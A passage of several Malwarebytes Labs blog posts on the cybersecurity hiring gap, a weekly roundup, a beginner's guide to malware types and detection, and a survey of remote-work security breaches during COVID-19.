In 2010, the Center for Strategic & International Studies (CSIS) released its report “A Human Capital Crisis in Cybersecurity.” According to the paper, “the cyber threat to the United States affects all aspects of society, business, and government, but there is neither a broad cadre of cyber experts nor an established cyber career field to build upon, particularly within the Federal government.”

Further, according to Jim Gosler, a then-visiting NSA scientist and the founding director of the CIA’s Clandestine Information Technology Office, only 1,000 security experts were available in the US with the “specialized skills to operate effectively in cyberspace.” The country, Gosler said in interviews, needed 10,000 to 30,000.

Though the cybersecurity skills gap was likely spotted before 2010, the CSIS paper partly captures a theory that draws supports today—the skills gap is a lack of talent.

Years later, the cybersecurity skills gap reportedly grew into a chasm. It would soon span the world.  

In 2016, the Enterprise Strategy Group called the cybersecurity skills gap a “state of emergency,” unveiling research that showed that 46 percent of senior IT and cybersecurity professionals at midmarket and enterprise companies described their departments’ lack of cybersecurity skills as “problematic.” The same year, separate data compiled by the professional IT association ISACA predicted that the entire world would be short 2 million cyber security professionals by the year 2019.

But by 2019, that prediction had already come true, according to a survey published that year by the International Information System Security Certification Consortium, or (ISC)2. The world, the group said, employed 2.8 million cybersecurity professionals, but it needed 4.07 million.

At the same time, a recent study projected that the skills gap in 2021 would be lower than the (ISC)2 estimate for today—instead predicting a need of 3.5 million professionals by next year. Throughout the years, separate studies have offered similarly conflicting numbers.

The variation can be dizzying, but it can be explained by a variation in motivations, said Agarwal. He said these reports do not exist in a vacuum, but are rather drawn up for companies and, perhaps unsurprisingly, for major universities, which rely on this data to help create new programs and to develop curriculum to attract current and prospective students.

It’s a path Agarwal went down years ago when developing a Master’s program in computer science at Northeastern University Silicon Valley extension. The data, he said, supported the program, showing some 14,000 Bay Area jobs that listed a Master’s degree as a requirement, while neighboring Bay Area schools were only on track to produce fewer than 500 Master’s graduates that year.

“There was a massive gap, so we launched the campus,” Agarwal said. The program garnered interest, but not as much as the data suggested.

Agarwal remembered thinking at the time: “What the hell is going on?” 

It turns out, a lot was going on, Agarwal said. For many students, the prospect of more student debt for a potentially higher pay was not enough to get them into the program. Further, the salaries for Bachelor’s graduates and Master’s graduates were close enough that students had a difficult time seeing the value in getting the advanced degree.

That weariness towards a Master’s degree in computer science also plagues cybersecurity education today, Agarwal said, comparing it to an advanced degree in Biology.

“Cybersecurity at the Master’s level is about the same as in Biology—it has no market value,” Agarwal said. “If you have a BA [in Biology], you’re a lab rat. If you have an MA, you’re a senior lab rat.”

So, imagine the confusion for cybersecurity candidates who, when applying for jobs, find Master’s degrees listed as requirements. And yet, that is far from uncommon. The requirement, like many others, can drive candidates away.

Searching different

For companies that feel like the cybersecurity talent they need simply does not exist, recruiters and strategists have different advice: Look for cybersecurity talent in a different way. That means more lenient degree and certification requirements, more openness to working remotely, and hiring for the aptitude of a candidate, rather than going down a must-have wish list.

Jim Johnson, senior vice president and Chief Technology Officer for the international recruiting agency Robert Half, said that, when he thinks about client needs in cybersecurity, he often recalls a conference panel he watched years ago. A panel of hiring experts, Johnson said, was asked a simple question: How do you find people?

One person, Johnson recalled, said “You need to be okay hiring people who know nothing.”

The lesson, Johnson said, was that companies should hire for aptitude and the ability to learn.

“You hire the personality that fits what you’re looking for,” Johnson said. “If they don’t have everything technically, but they’re a shoo-in for being able to learn it, that’s the person you bring up.”

Johnson also explained that, for some candidates, restrictive job requirements can actually scare them away. Johnson’s advice for companies is that they understand what they’re looking for, but they don’t make the requirements for the job itself so restrictive that it causes hesitation for some potential candidates.

“You might miss a great hire because you required three certifications and they had one, or they’re in the process of getting one,” Johnson said.

Similarly, Thomas Kranz, longtime cybersecurity consultant and current cybersecurity strategy adviser for organizations, called job requirements that specifically call for degrees as “the biggest barrier companies face when trying to hire cybersecurity talent.”

“This is an attitude that belongs firmly in the last century,” Kranz wrote. ‘Must have a [Bachelor of Science] or advanced degree’ goes hand in hand with ‘Why can’t we find the candidates we need?’”

This thinking has caught on beyond the world of recruiters.

In February, more than a dozen companies, including Malwarebytes, pledged to adopt the Aspen Institute’s “Principles for Growing and Sustaining the Nation’s Cybersecurity Workforce.”

The very first principle requires companies to “widen the aperture of candidate pipelines, including expanding recruitment focus beyond applicants with four-year degrees or using non-gender biased job descriptions.”

At Malwarebytes, the practice of removing strict degree requirements from cybersecurity job descriptions has been in place for cybersecurity hires for at least a year and a half.

“I will never list a BA or BS as a hard requirement for most positions,” said Malwarebytes Chief Information Security Officer John Donovan. “Work and life experience help to round out candidates, especially for cyber-security roles.” Donovan added that, for more junior positions, there are “creative ways to broaden the applicant pool,” such as using the recruiting programs YearUp, NPower, and others.

The two organizations, like many others, help transition individuals to tech-focused careers, offering training classes, internships, and access to a corporate world that was perhaps beyond reach.

These types of career development groups can also help a company looking to broaden its search to include typically overlooked communities, including minorities, women, disabled people, and veterans.

Take, for example, the International Consortium of Minority Cybersecurity Professionals, which creates opportunities for women and minorities to advance in the field, or the nonprofit Women in CyberSecurity (WiCyS), which recently developed a veterans’ program. WiCyS primarily works to cultivate the careers of women in cybersecurity by offering training sessions, providing mentorship, granting scholarships, and working with interested corporate partners.

“In cybersecurity, there are challenges that have never existed before,” said Lynn Dohm, executive director for WiCyS. “We need multitasking, diversity of thought, and people from all different backgrounds, all genders, and all ethnicities to tackle these challenges from all different perspectives.”

Finally, for companies still having trouble finding cybersecurity talent, Robert Half’s Johnson recommended broadening the search—literally. Cybersecurity jobs no longer need to be filled by someone located within a 40-mile radius, he said, and if anything, the current pandemic has reinforced this idea.

“The affect of the pandemic, which has shifted how people do their jobs, has made us now realize that the whole working remote thing isn’t as scary as we thought,” Johnson said.

But companies should understand that remote work is as much a boon to them as it is to potential candidates. No longer are qualified candidates limited in their search by what they can physically get to—now, they can apply for jobs that may seem more appealing that are much farther from where they live.

And that, of course, will have an impact on salary, Johnson said.

“While Bay Area salaries or a New York salary, while those might not change dramatically, what is changing is the folks that might be being recruited in Des Moines or in Omaha or Oklahoma City, who have traditionally been limited [regionally], now they’re being recruited by companies on the coast,” Johnson said.

“That’s affecting local companies, which are paying those $80,000 salaries. Now those candidates are being offered $85,000 to work remotely. Now I’ve got to compete with that.”

Planning ahead

The cybersecurity skills gap need not frighten a company or a senior cybersecurity manager looking to hire. There are many actionable steps that a business can take today to help broaden their search and find the talent that perhaps other companies are ignoring.

First, stop including hard degree requirements in job descriptions. The same goes for cybersecurity certifications. Second, start accepting the idea of remote work for these teams. The value of “butts in seats” means next to nothing right now, so get used to it. Third, understand that remote work means potentially better pay for the candidates you’re trying to hire, so look at the market data and pay appropriately. Fourth, connect with a recruiting organization, like WiCyS, if you want some extra help in creating a diverse and representative team. Fifth, also considering looking inwards, as your next cybersecurity hire might actually be a cybersecurity promotion.

And the last piece of advice, at least according to Robert Half’s Johnson? Hire a recruiter.

The post The cybersecurity skills gap is misunderstood appeared first on Malwarebytes Labs.

A week in security (August 17 – 23)

Last week on Malwarebytes Labs, we looked at the impact of COVID-19 on healthcare cybersecurity, dug into some pandemic stats in terms of how workforces coped with going remote, and served up a crash course on malware detection. Our most recent Lock and Code podcast explored the safety of parental monitoring apps.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (August 17 – 23) appeared first on Malwarebytes Labs.

‘Just tell me how to fix my computer:’ a crash course on malware detection

Malware. You’ve heard the term before, and you know it’s bad for your computer—like a computer virus. Which begs the question: Do the terms “malware” and “computer virus” mean the same thing? How do you know if your computer is infected with malware? Is “malware detection” just a fancy phrase for antivirus? For that matter, are anti-malware and antivirus programs the same? And let’s not forget about Apple and Android users, who are probably wondering if they need cybersecurity software at all.

This is the point where your head explodes.

All you want to do is get your work done, Zoom your friends/family, Instacart a bottle of wine, and stream a movie till you go to bed. But it’s during these everyday tasks that we let our guard down and are most susceptible to malware, which includes such cyberthreats as ransomware, Trojans, spyware, stalkerware, and, yes, viruses.

To add insult to injury, cybercriminals deliver malware using sneaky social engineering tricks, such as fooling people into opening email attachments that infect their computers or asking them to update their personal ~~~information on malicious websites pretending to be legitimate. Sounds awful, right? It sure is!

The good news is that staying safe online is actually fairly easy. All it takes is a little common sense, a basic understanding of how threats work, and a security program that can detect and protect against malware. Think of it like street smarts but for the Internet. With these three elements, you can safely avoid the majority of the dangers online today.

So, for the Luddites and the technologically challenged among our readership, this is your crash course on malware detection. In this article, we’ll answer all the questions you wish you didn’t have to ask like:

  • What is malware?
  • How can I detect malware?
  • Is Windows Defender good enough?
  • Do Mac and mobile devices need anti-malware?
  • How do you remove malware?
  • How do you prevent malware infections?

What is malware?

Malware, or “malicious software,” is a catchall term that refers to any malicious program that is harmful to your devices. Targets for malware can include your laptop, tablet, mobile phone, and WiFi router. Even household items like smart TVs, smart fridges, and newer cars with lots of onboard technology can be vulnerable. Put it this way: If it connects to the Internet, there’s a chance it could be infected with malware.

There are many types of malware, but here’s a gloss on the more infamous and/or popular examples in rotation today.

Adware

Adware, or advertising-supported software, is software that displays unwanted advertising on your computer or mobile device. As stated in the Malwarebytes Labs 2020 State of Malware Report, adware is the most common threat to Windows, Mac, and Android devices today.

While it may not be considered as dangerous as some other forms of malware, such as ransomware, adware has become increasingly aggressive and malicious over the last couple years, redirecting users from their online searches to advertising-supported results, adding unnecessary toolbars to browsers, peppering screens with hard-to-close pop-up ads, and making it difficult for users to uninstall.

Computer virus

A computer virus is a form of malware that attaches to another program (such as a document), which can then replicate and spread on its own after an initial execution on a system involving human interaction. But computer viruses aren’t as prevalent as they once were. Cybercriminals today tend to focus their efforts on more lucrative threats like ransomware.

Trojan

A Trojan is a program that hides its true intentions, often appearing legitimate but actually conducting malicious business. There are many families of malware that can be considered Trojans, from information-stealers to banking Trojans that siphon off account credentials and money.

Once active on a system, a Trojan can quietly steal your personal info, spam other potential victims from your account, or even load other forms of malware. One of the more effective Trojans on the market today is called Emotet, which has evolved from a basic info-stealer to a tool for spreading other forms of malware to other systems—especially within business networks.

Ransomware

Ransomware is a type of malware that locks you out of your device and/or encrypts your files, then forces you to pay a ransom to get them back. Many high-profile attacks against businesses, schools, and local government agencies over the last four years have included ransomware of some kind. Some of the more notorious recent strains of ransomware include Ryuk, Sodinokibi, and WastedLocker.

How can I detect malware?

There are a few ways to spot malware on your device. It may be running slower than usual. You may have loads of ads bombarding your screen. Your files may be frozen or your battery life may drain faster than usual. Or there may be no sign of infection at all.

That’s why good malware detection starts with a good anti-malware program. For our purposes, “good” anti-malware is going to be a program that can detect and protect against any of the threats we’ve covered above and then some, including what’s known as zero-day or zero-hour exploits. These are new threats developed by cybercriminals to exploit vulnerabilities, or weaknesses in code, that have not yet been detected or fixed by the company that created them. (That’s why when companies do fix these vulnerabilities, they issue patches, or updates, and notify users immediately.)

Antivirus and other legacy cybersecurity software rely on something called signature-based detection in order to stop threats. Signature-based detection works by comparing every file on your computer against a list of known malware. Each threat carries a signature that functions much like a set of fingerprints. If your security program finds code on your computer that matches the signature of a known threat, it’ll isolate and remove the malicious program.

While signature-based detection can be effective for protecting against known threats, it is time-consuming and resource-intensive for your computer. To continue our fingerprint analogy, signature-based detection can only spot threats with an established rap sheet. Brand-new malware, zero-day, and zero-hour exploits are free to spread and cause damage until security researchers identify the threat and reverse-engineer it, adding its signature to an increasingly bloated database.

This is where heuristic analysis comes in. Heuristic analysis relies on investigating a program’s behavior to determine whether a bit of computer code is malicious or not. In other words, if a program is acting like malware, it probably is malware. After demonstrating suspicious behavior, files are quarantined and can be manually or automatically removed—without having to add signatures to the database.

The best anti-malware programs, then, can protect against new and emerging zero-day/zero-hour threats using heuristic analysis, as well as threats we already know about using traditional signature-based detection. If your antivirus or anti-malware relies on signature-based malware detection alone to keep your system safe—you’re not really safe.

Is Windows Defender good enough?

Maybe you’re using Windows Defender because your computer came with it preinstalled. It seems fine, but you’ve never looked at other options. Or maybe you have Windows Defender and your computer somehow got an infection anyways. Either way, here’s something to consider: Defender is one of the most targeted security programs by cybercriminals. And there are whole categories of threats that Windows Defender doesn’t protect against.

The majority of threats detected today are found using signature-less technologies, but there are several other methods of malware detection that, when layered together, offer optimal protection over Windows Defender. Malwarebytes Premium, for example, uses a layered approach to threat detection that includes heuristic analysis technology as just one of its components. Other major components include ransomware protection and rollback, web protection, and anti-exploit technology.

Do Mac and mobile devices need anti-malware?

In 2019 for the first time ever, Macs outpaced Windows PCs in number of threats detected per endpoint. Over the last few years, Mac adware has exploded, debunking the myth that Macs are safe from cyberthreats. While Macs’ built-in AV blocks some malware, Mac adware has become so aggressive that it warrants extra anti-malware protection.

Meanwhile, Mac’s mobile counterpart, the iPhone, does not allow outside anti-malware programs to be downloaded. (Apple says its own built-in iOS protection is enough.) However, there are some privacy apps, web browser protection, and scam call blockers users can try for added safety.

As for Android, malware attacks from threats, such as adware, monitoring apps, and other potentially unwanted programs (PUPs) are more common. At best, PUPs serve up annoying ads you can’t get rid. At worst, they’ll discretely steal information from your phone.

Also, because the Android environment allows for third-party downloads, it’s a bit more vulnerable to malware and PUPs than the iPhone. So we recommend a good anti-malware solution for your Android device as well.

How can I remove malware?

Malware detection is the important first step for any cybersecurity solution. But what happens next? If you get a malware infection on one of your devices, the good news is you can easily remove it. The process of identifying and removing cyberthreats from your computer systems is called “remediation.”

To conduct a thorough remediation of your device, download an anti-malware program and run a scan. Before doing so, make sure you back up your files. Afterwards, change all of your account passwords in case they were compromised in the malware attack. And if you’re dealing with a tough infection, you’re in luck: Malwarebytes has a rock-solid reputation for removing malware that other programs can’t even detect let alone remove.

If you need to clean an infected computer now, download Malwarebytes for free, review these tips for remediation, and run a scan to see which threats are hiding on your devices.

How do I protect against malware?

Yes, it’s possible to clean up an infected computer and fully remove malware from your system. But the damage from some forms of malware, like ransomware, cannot be undone. If it’s encrypted your files and you haven’t backed them up, the jig is up. So your best defense is to beat the bad guys at their own game—by preventing infection in the first place.

There are a few ways to do this. Keeping all devices updated with the latest software patches will block threats designed to exploit older vulnerabilities. Automating backups of files to an encrypted cloud storage platform won’t protect against ransomware attacks, but it will ensure that you needn’t pay the ransom to retrieve your files. Training on cybersecurity best practices, including how to spot a phishing attack, tech support scam, or other social engineering technique, also helps stave off insider threats.

However, the best way to prevent malware infection is to use an antivirus/anti-malware program with layered protection that stops a wide range of cyberthreats in real time—whether it’s a malicious website or a brand-new malware family never before seen “in the wild.”

But if you have antivirus already and threats are getting through, maybe it’s time to move on to a program that’ll “just fix your computer” so you can stop worrying about malware detection and start…participating in distance learning classes? Ordering groceries? Having your virtual doctor’s appointment? Developing a vaccine? Literally anything else.

The post ‘Just tell me how to fix my computer:’ a crash course on malware detection appeared first on Malwarebytes Labs.

20 percent of organizations experienced breach due to remote worker, Labs report reveals

It is no surprise that moving to a fully remote work environment due to COVID-19 would cause a number of changes in organizations’ approaches to cybersecurity. What has been surprising, however, are some of the unanticipated shifts in employee habits and how they have impacted the security posture of businesses large and small.

Our latest Malwarebytes Labs report, Enduring from Home: COVID-19’s Impact on Business Security, reveals some unexpected data about security concerns with today’s remote workforce.

Our report combines Malwarebytes product telemetry with survey results from 200 IT and cybersecurity decision makers from small businesses to large enterprises, unearthing new security concerns that surfaced after the pandemic forced US businesses to send their workers home.

The data showed that since organizations moved to a work from home (WFH) model, the potential for cyberattacks and breaches has increased. While this isn’t entirely unexpected, the magnitude of this increase is surprising. Since the start of the pandemic, 20 percent of respondents said they faced a security breaches as a result of a remote worker. This in turn has increased costs, with 24 percent of respondents saying they paid unexpected expenses to address a cybersecurity breach or malware attack following shelter-in-place orders.

We noticed a stark increase in the use of personal devices for work: 28 percent of respondents admitted they’re using personal devices for work-related activities more than their work-issued devices. Beyond that, we found that 61 percent of respondents’ organizations did not urge employees to use antivirus solutions on their personal devices, further compounding the increase in attack surface with a lack of adequate protection.

We found a startling contrast between the IT leaders’ confidence in their security during the transition to work from home (WFH) environments, and their actual security postures, demonstrating a continued problem of security hubris. Roughly three quarters (73.2 percent) of our survey respondents gave their organizations a score of 7 or above on preparedness for the transition to WFH, yet 45 percent of respondents’ organizations did not perform security and online privacy analyses of necessary software tools for WFH collaboration.

Additional report takeaways

  • 18 percent of respondents admitted that, for their employees, cybersecurity was not a priority, while 5 percent said their employees were a security risk and oblivious to security best practices.
  • At the same time, 44 percent of respondents’ organizations did not provide cybersecurity training that focused on potential threats of working from home (like ensuring home networks had strong passwords, or devices were not left within reach of non-authorized users).
  • While 61 percent of respondents’ organizations provided work-issued devices to employees as needed, 65 percent did not deploy a new antivirus (AV) solution for those same devices.

To learn more about the increasing risks uncovered in today’s remote workforce population, read our full report:

Enduring from Home: COVID-19’s Impact on Business Security

The post 20 percent of organizations experienced breach due to remote worker, Labs report reveals appeared first on Malwarebytes Labs.